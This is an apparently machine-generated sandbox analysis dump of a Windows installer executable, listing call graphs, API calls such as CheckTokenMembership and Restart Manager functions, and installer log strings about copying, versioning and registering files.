40d818 19 API calls 57328->57382 57385 40dde4 19 API calls 57329->57385 57341 40e519 57331->57341 57334 403400 4 API calls 57342 40e5eb 57334->57342 57343 40e57e 57335->57343 57339 40e4a0 57384 40d470 19 API calls 57339->57384 57340->57334 57347 40e523 57341->57347 57348 40e51d 57341->57348 57342->57294 57349 40e582 57343->57349 57350 40e59b 57343->57350 57344 40e4e4 
57387 409d38 18 API calls 57344->57387 57389 40ea08 57347->57389 57357 40e521 57348->57357 57358 40e53c 57348->57358 57360 40ea08 19 API calls 57349->57360 57395 40de24 19 API calls 57350->57395 57352 40e461 57381 40ded8 19 API calls 57352->57381 57353 40e444 57379 40de24 19 API calls 57353->57379 57393 40de24 19 API calls 57357->57393 57362 40ea08 19 API calls 57358->57362 57360->57340 57361 40e44f 57380 40e26c 19 API calls 57361->57380 57363 40e544 57362->57363 57392 40d8a0 19 API calls 57363->57392 57366 40e566 57394 40e2d4 18 API calls 57366->57394 57401 40b9d0 57369->57401 57372->57284 57373->57284 57374 40d774 19 API calls 57374->57294 57375->57319 57377 40ea08 19 API calls 57376->57377 57378 40d76e 57377->57378 57378->57352 57378->57353 57379->57361 57380->57340 57381->57340 57382->57340 57383->57339 57384->57340 57385->57340 57386->57344 57387->57340 57388->57340 57396 40d780 57389->57396 57392->57340 57393->57366 57394->57340 57395->57340 57399 40d78b 57396->57399 57397 40d7c5 57397->57340 57399->57397 57400 40d7cc 19 API calls 57399->57400 57400->57399 57402 40b9e2 57401->57402 57404 40ba07 57401->57404 57402->57404 57405 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57402->57405 57404->57294 57404->57374 57405->57404 57407 40ea08 19 API calls 57406->57407 57408 40d4c9 57407->57408 57409 40d4dc 57408->57409 57413 40eb0c 19 API calls 57408->57413 57409->57276 57411 40d4d7 57414 40d458 19 API calls 57411->57414 57413->57411 57414->57409 57419 40ab7c 33 API calls 57415->57419 57417 40da00 57417->57317 57418->57317 57419->57417 58047 40ce7c 58048 40ce84 58047->58048 58049 40ceb2 58048->58049 58050 40cea7 58048->58050 58058 40ceae 58048->58058 58052 40ceb6 58049->58052 58053 40cec8 58049->58053 58060 406288 GlobalHandle GlobalUnlock GlobalFree 58050->58060 58059 40625c GlobalAlloc GlobalLock 58052->58059 58061 40626c GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 58053->58061 58056 40cec4 58057 408cbc 19 API calls 58056->58057 58056->58058 
58057->58058 58059->58056 58060->58058 58061->58056 58062 41363c SetWindowLongA GetWindowLongA 58063 413699 SetPropA SetPropA 58062->58063 58064 41367b GetWindowLongA 58062->58064 58069 41f39c 58063->58069 58064->58063 58065 41368a SetWindowLongA 58064->58065 58065->58063 58074 415270 58069->58074 58081 423c0c 58069->58081 58175 423a84 58069->58175 58070 4136e9 58075 41527d 58074->58075 58076 4152e3 58075->58076 58077 4152d8 58075->58077 58079 4152e1 58075->58079 58182 424b8c 13 API calls 58076->58182 58077->58079 58183 41505c 60 API calls 58077->58183 58079->58070 58086 423c42 58081->58086 58084 423cec 58087 423cf3 58084->58087 58088 423d27 58084->58088 58085 423c8d 58089 423c93 58085->58089 58090 423d50 58085->58090 58109 423c63 58086->58109 58184 423b68 58086->58184 58091 423fb1 58087->58091 58092 423cf9 58087->58092 58095 423d32 58088->58095 58096 42409a IsIconic 58088->58096 58093 423cc5 58089->58093 58094 423c98 58089->58094 58097 423d62 58090->58097 58098 423d6b 58090->58098 58091->58109 58150 423fd7 IsWindowEnabled 58091->58150 58100 423f13 SendMessageA 58092->58100 58101 423d07 58092->58101 58093->58109 58125 423cde 58093->58125 58126 423e3f 58093->58126 58103 423df6 58094->58103 58104 423c9e 58094->58104 58105 4240d6 58095->58105 58106 423d3b 58095->58106 58102 4240ae GetFocus 58096->58102 58096->58109 58107 423d78 58097->58107 58108 423d69 58097->58108 58191 424194 11 API calls 58098->58191 58100->58109 58101->58109 58116 423cc0 58101->58116 58137 423f56 58101->58137 58102->58109 58111 4240bf 58102->58111 58196 423b84 NtdllDefWindowProc_A 58103->58196 58112 423ca7 58104->58112 58113 423e1e PostMessageA 58104->58113 58205 424850 WinHelpA PostMessageA 58105->58205 58106->58116 58117 4240ed 58106->58117 58110 4241dc 11 API calls 58107->58110 58192 423b84 NtdllDefWindowProc_A 58108->58192 58109->58070 58110->58109 58204 41eff4 GetCurrentThreadId EnumThreadWindows 58111->58204 58121 423cb0 58112->58121 58122 423ea5 58112->58122 58197 423b84 
NtdllDefWindowProc_A 58113->58197 58116->58109 58190 423b84 NtdllDefWindowProc_A 58116->58190 58123 4240f6 58117->58123 58124 42410b 58117->58124 58129 423cb9 58121->58129 58130 423dce IsIconic 58121->58130 58131 423eae 58122->58131 58132 423edf 58122->58132 58133 4244d4 19 API calls 58123->58133 58206 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 58124->58206 58125->58116 58134 423e0b 58125->58134 58188 423b84 NtdllDefWindowProc_A 58126->58188 58128 4240c6 58128->58109 58138 4240ce SetFocus 58128->58138 58129->58116 58139 423d91 58129->58139 58142 423dea 58130->58142 58143 423dde 58130->58143 58199 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 58131->58199 58189 423b84 NtdllDefWindowProc_A 58132->58189 58133->58109 58146 424178 26 API calls 58134->58146 58136 423e45 58147 423e83 58136->58147 58148 423e61 58136->58148 58137->58109 58161 423f78 IsWindowEnabled 58137->58161 58138->58109 58139->58109 58193 422c4c ShowWindow PostMessageA PostQuitMessage 58139->58193 58141 423e39 58141->58109 58195 423b84 NtdllDefWindowProc_A 58142->58195 58194 423bc0 29 API calls 58143->58194 58146->58109 58155 423a84 6 API calls 58147->58155 58198 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 58148->58198 58149 423eb6 58157 423ec8 58149->58157 58163 41ef58 6 API calls 58149->58163 58150->58109 58158 423fe5 58150->58158 58153 423ee5 58159 423efd 58153->58159 58165 41eea4 2 API calls 58153->58165 58162 423e8b PostMessageA 58155->58162 58200 423b84 NtdllDefWindowProc_A 58157->58200 58168 423fec IsWindowVisible 58158->58168 58166 423a84 6 API calls 58159->58166 58160 423e69 PostMessageA 58160->58109 58161->58109 58167 423f86 58161->58167 58162->58109 58163->58157 58165->58159 58166->58109 58201 412310 21 API calls 58167->58201 58168->58109 58170 423ffa GetFocus 58168->58170 58171 4181e0 58170->58171 58172 42400f SetFocus 58171->58172 58202 415240 58172->58202 58176 423b0d 58175->58176 58177 423a94 58175->58177 58176->58070 
58177->58176 58178 423a9a EnumWindows 58177->58178 58178->58176 58179 423ab6 GetWindow GetWindowLongA 58178->58179 58207 423a1c GetWindow 58178->58207 58180 423ad5 58179->58180 58180->58176 58181 423b01 SetWindowPos 58180->58181 58181->58176 58181->58180 58182->58079 58183->58079 58185 423b72 58184->58185 58186 423b7d 58184->58186 58185->58186 58187 408720 21 API calls 58185->58187 58186->58084 58186->58085 58187->58186 58188->58136 58189->58153 58190->58109 58191->58109 58192->58109 58193->58109 58194->58109 58195->58109 58196->58109 58197->58141 58198->58160 58199->58149 58200->58109 58201->58109 58203 41525b SetFocus 58202->58203 58203->58109 58204->58128 58205->58141 58206->58141 58208 423a3d GetWindowLongA 58207->58208 58209 423a49 58207->58209 58208->58209
Strings
• Failed to strip read-only attribute., xrefs: 00470D47
• Installing into GAC, xrefs: 00471588
• Time stamp of our file: %s, xrefs: 0047080F
• Version of our file: %u.%u.%u.%u, xrefs: 00470964
• Dest file is protected by Windows File Protection., xrefs: 00470761
• Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470B29
• Dest filename: %s, xrefs: 00470708
• Uninstaller requires administrator: %s, xrefs: 00471003
• , xrefs: 00470A43, 00470C14, 00470C92
• Existing file has a later time stamp. Skipping., xrefs: 00470C43
• Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470B38
• Incrementing shared file count (32-bit)., xrefs: 00471419
• Will register the file (a DLL/OCX) later., xrefs: 00471393
• Version of our file: (none), xrefs: 00470970
• User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470D0A
• Couldn't read time stamp. Skipping., xrefs: 00470BA9
• .tmp, xrefs: 00470E2B
• Skipping due to "onlyifdestfileexists" flag., xrefs: 00470D6E
• Same version. Skipping., xrefs: 00470B59
• Stripped read-only attribute., xrefs: 00470D3B
• Incrementing shared file count (64-bit)., xrefs: 00471400
• Version of existing file: %u.%u.%u.%u, xrefs: 004709F0
• Time stamp of our file: (failed to read), xrefs: 0047081B
• Non-default bitness: 64-bit, xrefs: 00470723
• Skipping due to "onlyifdoesntexist" flag., xrefs: 00470842
• Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470B44
• Same time stamp. Skipping., xrefs: 00470BC9
• -- File entry --, xrefs: 0047056F
• @, xrefs: 00470624
• Time stamp of existing file: %s, xrefs: 0047089F
• Dest file exists., xrefs: 0047082F
• Time stamp of existing file: (failed to read), xrefs: 004708AB
• User opted not to overwrite the existing file. Skipping., xrefs: 00470CC1
• Non-default bitness: 32-bit, xrefs: 0047072F
• Existing file is protected by Windows File Protection. Skipping., xrefs: 00470C60
• Will register the file (a type library) later., xrefs: 00471387
• InUn, xrefs: 00470FD3
• Installing the file., xrefs: 00470D7D
• Version of existing file: (none), xrefs: 00470B6E
• Existing file is a newer version. Skipping., xrefs: 00470A76
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID:
• String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
• API String ID: 0-4021121268
• Opcode ID: 9d68f8344ce4977df8583e247318b1194b32105c4f4fc62b9f0a4044c1636d2c
• Instruction ID: b563e12d89f4af072a7005ff78b426759e5259748c8527a90f65f129335a0b73
• Opcode Fuzzy Hash: 9d68f8344ce4977df8583e247318b1194b32105c4f4fc62b9f0a4044c1636d2c
• Instruction Fuzzy Hash: 0B925234A0424CDFDB11DFA9C485BDDBBB5AF05308F1480ABE848A7392D778AE45CB59

Control-flow Graph
                                                                              control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1593 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1593 1594 42e1bd-42e1c5 GetLastError 1589->1594 1591 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1591 1592 42e16a-42e16f call 4031bc 1590->1592 1591->1589 1597 42e189-42e18e call 4031bc 1591->1597 1592->1581 1604 42e208-42e210 1593->1604 1605 42e1fc-42e206 call 4031bc * 2 1593->1605 1594->1593 1598 42e1c7-42e1d1 call 4031bc * 2 1594->1598 1597->1581 1598->1581 1609 42e212-42e213 1604->1609 1610 42e243-42e261 call 402660 CloseHandle 1604->1610 1605->1581 1614 42e215-42e228 EqualSid 1609->1614 1617 42e22a-42e237 1614->1617 1618 42e23f-42e241 1614->1618 1617->1618 1620 42e239-42e23d 1617->1620 1618->1610 1618->1614 1620->1610
APIs
• AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
• GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
• GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
• CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
• FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
Strings
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
• String ID: 1{I$CheckTokenMembership$advapi32.dll
• API String ID: 2252812187-4020693264
• Opcode ID: 99385c8667cd0eb2f7e8a761a457fbfbdd7e71a8091fdfbf45cde5befae85eff
• Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
• Opcode Fuzzy Hash: 99385c8667cd0eb2f7e8a761a457fbfbdd7e71a8091fdfbf45cde5befae85eff
• Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

Control-flow Graph
                                                                              control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                              APIs
                                                                              • GetVersion.KERNEL32(00480636), ref: 004502D3
                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480636), ref: 004502EB
                                                                              • GetProcAddress.KERNEL32(6E570000,RmStartSession), ref: 00450309
                                                                              • GetProcAddress.KERNEL32(6E570000,RmRegisterResources), ref: 0045031E
                                                                              • GetProcAddress.KERNEL32(6E570000,RmGetList), ref: 00450333
                                                                              • GetProcAddress.KERNEL32(6E570000,RmShutdown), ref: 00450348
                                                                              • GetProcAddress.KERNEL32(6E570000,RmRestart), ref: 0045035D
                                                                              • GetProcAddress.KERNEL32(6E570000,RmEndSession), ref: 00450372
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoadVersion
                                                                              • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                              • API String ID: 1968650500-3419246398
                                                                              • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                              • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                              • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                              • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                                              Control-flow Graph (graph omitted; basic blocks 423c0c-42417b calling IsIconic, GetFocus, SetFocus, IsWindowEnabled, IsWindowVisible, SendMessageA and PostMessageA)
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b9e250b99cf182ccbef41989ebe76349b30642d984367dffe3cd9cb4059d0181
                                                                              • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                              • Opcode Fuzzy Hash: b9e250b99cf182ccbef41989ebe76349b30642d984367dffe3cd9cb4059d0181
                                                                              • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09
                                                                              APIs
                                                                                • Part of subcall function 0049543C: GetWindowRect.USER32(00000000), ref: 00495452
                                                                              • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 004675E7
                                                                                • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,00467601), ref: 0041D6DB
                                                                                • Part of subcall function 00466FF4: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467097
                                                                                • Part of subcall function 00466FF4: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004670BD
                                                                                • Part of subcall function 00466FF4: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00467114
                                                                                • Part of subcall function 004669B4: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,0046769C,00000000,00000000,00000000,0000000C,00000000), ref: 004669CC
                                                                                • Part of subcall function 004956C0: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 004956CA
                                                                                • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                • Part of subcall function 0049538C: GetDC.USER32(00000000), ref: 004953AE
                                                                                • Part of subcall function 0049538C: SelectObject.GDI32(?,00000000), ref: 004953D4
                                                                                • Part of subcall function 0049538C: ReleaseDC.USER32(00000000,?), ref: 00495425
                                                                                • Part of subcall function 004956B0: MulDiv.KERNEL32(0000004B,?,00000006), ref: 004956BA
                                                                              • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0235FAF0,02361850,?,?,02361880,?,?,023618D0,?), ref: 00468271
                                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00468282
                                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0046829A
                                                                                • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                              • String ID: $(Default)$STOPIMAGE
                                                                              • API String ID: 3231140908-770201673
                                                                              • Opcode ID: d8aa18b457e06c76cf1710bd301156fff42577b8956d306d2f0c8863d05d0704
                                                                              • Instruction ID: 95164e1e617b107b44698f642e4cc1154f551ad52f4085116ed94e07ec8bca55
                                                                              • Opcode Fuzzy Hash: d8aa18b457e06c76cf1710bd301156fff42577b8956d306d2f0c8863d05d0704
                                                                              • Instruction Fuzzy Hash: BEF2C6786005148FCB00EB59D9D9F9973F1BF49304F1542BAE9049B36ADB74EC4ACB8A
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00474F66,?,?,0049C1DC,00000000), ref: 00474E55
                                                                              • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474F66,?,?,0049C1DC,00000000), ref: 00474F32
                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474F66,?,?,0049C1DC,00000000), ref: 00474F40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID: unins$unins???.*
                                                                              • API String ID: 3541575487-1009660736
                                                                              • Opcode ID: 5e576b03208d2e259677c02318acd6f2ad4d278db2359f1cb77b12eb5b061527
                                                                              • Instruction ID: 31c653d7bd6b2cf4ad5ba67a359891eda5ad6ed959604e3cb46055c530bb22dc
                                                                              • Opcode Fuzzy Hash: 5e576b03208d2e259677c02318acd6f2ad4d278db2359f1cb77b12eb5b061527
                                                                              • Instruction Fuzzy Hash: 2A313370A001089FCB10EF65D991ADEB7A9DF85318F51C4B6F80CA76A2DB389F418B58
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                              • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileFindFirstLast
                                                                              • String ID:
                                                                              • API String ID: 873889042-0
                                                                              • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                              • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                              • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                              • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                              APIs
                                                                              • GetVersion.KERNEL32(00000434,0046DFEE), ref: 0046DF62
                                                                              • CoCreateInstance.OLE32(00499B84,00000000,00000001,00499B94,?,00000434,0046DFEE), ref: 0046DF7E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstanceVersion
                                                                              • String ID:
                                                                              • API String ID: 1462612201-0
                                                                              • Opcode ID: 590230f93a95ca5811c62fe34acfb8e2c0307c22a832fa8ed403bfd539588e2d
                                                                              • Instruction ID: 3442edb0ea1fabc64a92ad6c3e34ff78e3c28f6093e8310d9e86ee8e53d0260d
                                                                              • Opcode Fuzzy Hash: 590230f93a95ca5811c62fe34acfb8e2c0307c22a832fa8ed403bfd539588e2d
                                                                              • Instruction Fuzzy Hash: 4EF0A031B85200DEEB14A7A9DC45B463BD4BB24328F04007BF0448B295E3AC9850861F
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                              • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                              • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
